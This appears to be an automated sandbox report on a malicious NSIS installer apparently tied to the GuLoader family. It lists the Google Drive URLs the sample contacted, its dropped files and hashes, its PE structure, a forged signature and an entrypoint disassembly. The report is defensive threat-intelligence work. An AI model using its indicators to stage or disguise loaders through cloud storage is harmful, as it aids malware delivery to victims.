                  https://drive.google.com/ertificatesQNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://drive.google.com/sQNuQ5e175D.exe, 00000004.00000003.2361334924.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128656586.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240155348.00000000039E3000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2372316393.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128689468.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2117883344.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240128134.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2250724175.00000000039DF000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://drive.google.com/F4409BC0D96FBCBDDEEE6C0AFBFQNuQ5e175D.exe, 00000004.00000003.2361334924.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2372316393.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://drive.google.com/-QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://drive.usercontent.google.com/QNuQ5e175D.exe, 00000004.00000003.2361334924.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128656586.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240155348.00000000039E3000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2372316393.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128689468.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2007544968.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2117883344.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240128134.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2250724175.00000000039DF000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://apis.google.comQNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2117883344.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240128134.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605627561.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039A8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2250724175.00000000039DF000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://nsis.sf.net/NSIS_ErrorErrorQNuQ5e175D.exefalse
                                		high
                                https://drive.google.com/srQNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://drive.usercontent.google.com/0QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://drive.google.com/eQNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      142.250.184.206
                                      		drive.google.comUnited States
                                      		15169GOOGLEUSfalse
                                      172.217.16.193
                                      		drive.usercontent.google.comUnited States
                                      		15169GOOGLEUSfalse

                                      General Information

                                      Joe Sandbox version:42.0.0 Malachite
                                      Analysis ID:1588755
                                      Start date and time:2025-01-11 05:11:45 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 7m 0s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Run name:Run with higher sleep bypass
                                      Number of analysed new started processes analysed:6
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:QNuQ5e175D.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:e5fd95536576d21b43b1552aed3040ea366375b5a952c333dd89f1ed251c12aa.exe
                                      Detection:MAL
                                      Classification:mal68.troj.evad.winEXE@3/5@2/2
                                      EGA Information:
                                      • Successful, ratio: 50%
                                      HCA Information:
                                      • Successful, ratio: 84%
                                      • Number of executed functions: 52
                                      • Number of non-executed functions: 63
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                      • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                      Warnings

                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                      • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target QNuQ5e175D.exe, PID 7776 because there are no executed function
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                      Simulations

                                      Behavior and APIs

                                      No simulations

                                      Joe Sandbox View / Context

                                      IPs

                                      No context

                                      Domains

                                      No context

                                      ASNs

                                      No context

                                      JA3 Fingerprints

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      37f463bf4616ecd445d4a1937da06e197uY105UTJU.exeGet hashmaliciousGuLoaderBrowse
                                      • 142.250.184.206
                                      • 172.217.16.193
                                      iwEnYIOol8.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                      • 142.250.184.206
                                      • 172.217.16.193
                                      Ntwph4urc1.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                      • 142.250.184.206
                                      • 172.217.16.193
                                      2976587-987347589.07.exeGet hashmaliciousNitol, XmrigBrowse
                                      • 142.250.184.206
                                      • 172.217.16.193
                                      2976587-987347589.08.exeGet hashmaliciousNitolBrowse
                                      • 142.250.184.206
                                      • 172.217.16.193
                                      Ntwph4urc1.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                      • 142.250.184.206
                                      • 172.217.16.193
                                      2976587-987347589.08.exeGet hashmaliciousUnknownBrowse
                                      • 142.250.184.206
                                      • 172.217.16.193
                                      yMXFgPOdf2.exeGet hashmaliciousGuLoaderBrowse
                                      • 142.250.184.206
                                      • 172.217.16.193
                                      2976587-987347589.07.exeGet hashmaliciousUnknownBrowse
                                      • 142.250.184.206
                                      • 172.217.16.193

                                      Dropped Files

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dllZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                        letsVPN.exeGet hashmaliciousUnknownBrowse
                                          letsVPN.exeGet hashmaliciousUnknownBrowse
                                            Revo.Uninstaller.Pro.v5.3.4.exeGet hashmaliciousUnknownBrowse
                                              Revo.Uninstaller.Pro.v5.3.4.exeGet hashmaliciousUnknownBrowse
                                                Documenti di spedizione.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                  Order NO 000293988494948595850000595995000.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                    kelscrit.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                      FiddlerSetup.5.0.20245.10105-latest.exeGet hashmaliciousPureLog Stealer, zgRATBrowse

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll

                                                        Download File
                                                        Process:C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):12288
                                                        Entropy (8bit):5.804946284177748
                                                        Encrypted:false
                                                        SSDEEP:192:ljHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZqE0QPi:R/Qlt7wiij/lMRv/9V4bfr
                                                        MD5:192639861E3DC2DC5C08BB8F8C7260D5
                                                        SHA1:58D30E460609E22FA0098BC27D928B689EF9AF78
                                                        SHA-256:23D618A0293C78CE00F7C6E6DD8B8923621DA7DD1F63A070163EF4C0EC3033D6
                                                        SHA-512:6E573D8B2EF6ED719E271FD0B2FD9CD451F61FC9A9459330108D6D7A65A0F64016303318CAD787AA1D5334BA670D8F1C7C13074E1BE550B4A316963ECC465CDC
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                        Joe Sandbox View:
                                                        • Filename: ZoRLXzC5qF.exe, Detection: malicious, Browse
                                                        • Filename: letsVPN.exe, Detection: malicious, Browse
                                                        • Filename: letsVPN.exe, Detection: malicious, Browse
                                                        • Filename: Revo.Uninstaller.Pro.v5.3.4.exe, Detection: malicious, Browse
                                                        • Filename: Revo.Uninstaller.Pro.v5.3.4.exe, Detection: malicious, Browse
                                                        • Filename: Documenti di spedizione.bat.exe, Detection: malicious, Browse
                                                        • Filename: Order NO 000293988494948595850000595995000.exe, Detection: malicious, Browse
                                                        • Filename: kelscrit.exe, Detection: malicious, Browse
                                                        • Filename: FiddlerSetup.5.0.20245.10105-latest.exe, Detection: malicious, Browse
                                                        Reputation:moderate, very likely benign file
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....C.f...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres\Assureringer69.udv

                                                        Download File
                                                        Process:C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        File Type:Matlab v4 mat-file (little endian) X, numeric, rows 0, columns 0
                                                        Category:dropped
                                                        Size (bytes):376884
                                                        Entropy (8bit):1.2538694993882065
                                                        Encrypted:false
                                                        SSDEEP:1536:eTJcpruMcjYX8Jf2lBD7XWqllCEYyZB0mFS04:eJcpPIYX8JonFS3
                                                        MD5:943DE1999A45C6772E1F2FB9E1803546
                                                        SHA1:542FC5B588D85BB0E7FCEED47789836A9C428984
                                                        SHA-256:1CCAB41F428AAB780F43CA2C25EB80A63755BD7977DFF975ED662FDB9672D515
                                                        SHA-512:A6AC5B8C7A1DBC2F06888E0F9285A6E1BD39A6C35E021BB5E3DC179E1EA176BEDDC7AD8C49CAEDDD7E10E232F980C7186E05DB890E001BA481E24E9D7EE4C434
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:..................0.X.........(.................;..........P...................S..........................................................................................m.......................................................................................................................n..........+.........v...................J...............'...........................................................i.......6........!.E................a...........................'....u....L......W...............................................................................................J................................................................~.................,..........................................n.................. .....................................................................................................................P......a.......T.......................................................................................................................................

                                                        C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres\Nonpatentability.Cou

                                                        Download File
                                                        Process:C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):222843
                                                        Entropy (8bit):7.362565451544298
                                                        Encrypted:false
                                                        SSDEEP:6144:gZ4ZblE1Ev2ugYpg+POgIPWJHbZeowW7H42LK:gZ4ZMEviYpgEHJHbwtKH422
                                                        MD5:20E1BC5AD88D5F2BE5A58EFC3EA1457B
                                                        SHA1:1099DBD1065F6958A014552FD0DF5D26CFF1CFB7
                                                        SHA-256:1FC0AA24E14AC6EA316ED1E1293D9F4B9B19047BCD5BAC97B35E2DB1AEDD7246
                                                        SHA-512:F97570AFF8D400CB300E05A4C57A8EA3D016FA9DC2675CAF89BFAB8B6465A2A021AA201B9E2CBD0472136207B4F92E20775EAF81BB0C926549FE7DD452B260D7
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.............................................==..........G...0.I...............S.......MM.............ww...\..........x................7..>..................aa.\\...........%%%..^.....e.......VVVV...........................................MMM..PP.YY.{.z..x.....-...rr.....................................MMM.......VV...[.111.................................................+.........................%%........WW...eeee..................................................k........................................zz.{.........\.....[......::........jjj.........ZZZZZ..j.`...............D.....:..nnnn..........bb.q.................MM...........ee.|.......T...{....;.........)............11.....$$$.......hhh.DD.....r.RRRR.""............... ....EEEE...pp......................................................--......................VV......_.................///...CCC.1.........8.;;;............................f...yy..... ...........q..............KK.....................i....y...00..@@.Z..o.........

                                                        C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres\Sunbreak.Pat

                                                        Download File
                                                        Process:C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):37114
                                                        Entropy (8bit):4.648205422140126
                                                        Encrypted:false
                                                        SSDEEP:384:z0GZqpL6AJbzyEyPpyOFYqjG3YL3BM6doOGNblZ9bQZkCC90fFjrBv26dUayacAM:IGKzaZFYqC3500310fhdKtz
                                                        MD5:A2C20BC4DA366C09E9FD86704A33CB0C
                                                        SHA1:91A57F0DDBE7C4E7556BA38BB2CFC8C8C5B52CEC
                                                        SHA-256:2BF4E12311D437A5B61F085C80ED3B3A8C29E77674DAC41F4829E4251C3878A1
                                                        SHA-512:27ADF3C40D1B3583D4104DB2E5A221F0963A25DB7C593426556493EC536C24F2B7866A8B7DF69F8E4127DAE78510B4FC7CAF65660EE2F25EE791C3480E38532B
                                                        Malicious:false
                                                        Preview:..V...............Z....MM..........vv.::.....,.|||. ....................................F.....Kk.....c....-.............bb........F..............t....|.. ............>....T............e...P..@@@.Y...f....oo.........``...................h.HH....%%.........V.........Q...TTT..r............PP..........OO.:....vvvvvvvvvv.:........MM....mm.....QQQQQ...................n.....EE....C.....h...............|...........r..#...xx.ttt............p...U.......o....0.e.........rrr.......m...........`.]]]..................KK.....E...................`.......l........... .......f...dd..... ....O..KK......[[[.666666..=. .......n..'.AAAAA........3............4444....DD...o........AA.....}}}}...TTT...........yy.z...~.11................2....Q..nnnnnnn.......~....................L.."..............JJ.G.......//.9..............:................................... ......hhhh............................ww............:.....WW..(......................::.c....3...q..............i...............O.............C..66

                                                        C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres\serow.kar

                                                        Download File
                                                        Process:C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):437967
                                                        Entropy (8bit):1.2496824675371185
                                                        Encrypted:false
                                                        SSDEEP:768:YszAIbEHsrUdiWwGdV5C+P4/1F93McF1TWcY7hYu4nR/CFxofOrNYSOq5HGieGwO:YJkFhJAhX55ckvF4ULrV2Ehr3gra5
                                                        MD5:0695A340DE7C3F5F45036C9C9EAFDBD2
                                                        SHA1:D741BBBBFAD62B1D85E87CEDD3F344F4062C33D6
                                                        SHA-256:0020F3470C29CAC49F8521309D6DA437EC6F71B2F5BD41A7B5DD88788B5AC25F
                                                        SHA-512:D2668C1016BBE3DF9CE638D834AA13CC1100D4B85FCB4AC7396DA8166B50F0B2AF0A9025BA35D54A865EC87F356EEEB7A577B000B9B50F8ECC996B3E798CF145
                                                        Malicious:false
                                                        Preview:....Z...................................,.............O............2............................N...........J................................................................M..v..H...........................E.......K............................S..........T.......=............#.............................-...............................8.................................'......................0.................................t....................................0....................6..................|.......................................................;...............=................................K..............................................................................W..........{....................`............................................................................|...................................................................w....T................S............................y...........x......................J.......................................1......

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                        Entropy (8bit):7.407220190167989
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:QNuQ5e175D.exe
                                                        File size:585'064 bytes
                                                        MD5:9bb2cdb8508ee2255a35ecec43462a48
                                                        SHA1:c7465e8b0a3ae61b23520752afbb8bf89a3cecdd
                                                        SHA256:e5fd95536576d21b43b1552aed3040ea366375b5a952c333dd89f1ed251c12aa
                                                        SHA512:0b8e8399eb04372c1cb70467dca25078ab255d01c448fa7ccabd620d9066306a1127c4e5caa4af66226662bb3b2d143045b9212332e7408c7b97ea40672a0ac1
                                                        SSDEEP:12288:ifYfUlNHYh6EEfqUhn5i5mfQAsS+6ePZxIgLF7eEbH+aj:ifYMPYcqUhY5mp9+6ehxIg5H9j
                                                        TLSH:E0C4F0257614AC5AC4EC10358BDDDE7B07630F6A7B6C521F73C4BE4C7AB9A816922323
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................j.........

                                                        File Icon

                                                        Icon Hash:016c4c4ebe99dd65

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x403552
                                                        Entrypoint Section:.text
                                                        Digitally signed:true
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x660843FB [Sat Mar 30 16:55:23 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f4639a0b3116c2cfc71144b88a929cfd

                                                        Authenticode Signature

                                                        Signature Valid:false
                                                        Signature Issuer:CN=nonconverging, O=nonconverging, L=Cliff, C=US
                                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                        Error Number:-2146762487
                                                        Not Before, Not After
                                                        • 18/03/2024 07:00:38 18/03/2027 07:00:38
                                                        Subject Chain
                                                        • CN=nonconverging, O=nonconverging, L=Cliff, C=US
                                                        Version:3
                                                        Thumbprint MD5:B0E922076FFE2DF5FE70C6AC8CD556A2
                                                        Thumbprint SHA-1:CE784EA178F07EE5869E76F3117DD8B531152C79
                                                        Thumbprint SHA-256:B8488CDBED36172DB2D61C9AB8ED59564E9285624F8AE446AA90892EF78FB1EC
                                                        Serial:5A5D66BB316E150417CDF6D37A5D77AE424A4754

                                                        Entrypoint Preview

                                                        Instruction
                                                        sub esp, 000003F8h
                                                        push ebp
                                                        push esi
                                                        push edi
                                                        push 00000020h
                                                        pop edi
                                                        xor ebp, ebp
                                                        push 00008001h
                                                        mov dword ptr [esp+20h], ebp
                                                        mov dword ptr [esp+18h], 0040A2D8h
                                                        mov dword ptr [esp+14h], ebp
                                                        call dword ptr [004080A4h]
                                                        mov esi, dword ptr [004080A8h]
                                                        lea eax, dword ptr [esp+34h]
                                                        push eax
                                                        mov dword ptr [esp+4Ch], ebp
                                                        mov dword ptr [esp+0000014Ch], ebp
                                                        mov dword ptr [esp+00000150h], ebp
                                                        mov dword ptr [esp+38h], 0000011Ch
                                                        call esi
                                                        test eax, eax
                                                        jne 00007FB628EDEE4Ah
                                                        lea eax, dword ptr [esp+34h]
                                                        mov dword ptr [esp+34h], 00000114h
                                                        push eax
                                                        call esi
                                                        mov ax, word ptr [esp+48h]
                                                        mov ecx, dword ptr [esp+62h]
                                                        sub ax, 00000053h
                                                        add ecx, FFFFFFD0h
                                                        neg ax
                                                        sbb eax, eax
                                                        mov byte ptr [esp+0000014Eh], 00000004h
                                                        not eax
                                                        and eax, ecx
                                                        mov word ptr [esp+00000148h], ax
                                                        cmp dword ptr [esp+38h], 0Ah
                                                        jnc 00007FB628EDEE18h
                                                        and word ptr [esp+42h], 0000h
                                                        mov eax, dword ptr [esp+40h]
                                                        movzx ecx, byte ptr [esp+3Ch]
                                                        mov dword ptr [004347B8h], eax
                                                        xor eax, eax
                                                        mov ah, byte ptr [esp+38h]
                                                        movzx eax, ax
                                                        or eax, ecx
                                                        xor ecx, ecx
                                                        mov ch, byte ptr [esp+00000148h]
                                                        movzx ecx, cx
                                                        shl eax, 10h
                                                        or eax, ecx
                                                        movzx ecx, byte ptr [esp+0000004Eh]

                                                        Rich Headers

                                                        Programming Language:
                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x86080xa0.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x680000x2ac78.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x8e4600x908.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x68f80x6a00595406ea4e71ef6f8675a1bd30bcc8f9False0.6703272405660378data6.482222402519068IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rdata0x80000x14640x1600a995b118b38426885fc6ccaa984c8b7aFalse0.4314630681818182data4.969091535632612IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0xa0000x2a8180x6007a91ec9f1c18e608c3f3f503ba4191c1False0.5221354166666666data4.165541189894117IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .ndata0x350000x330000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
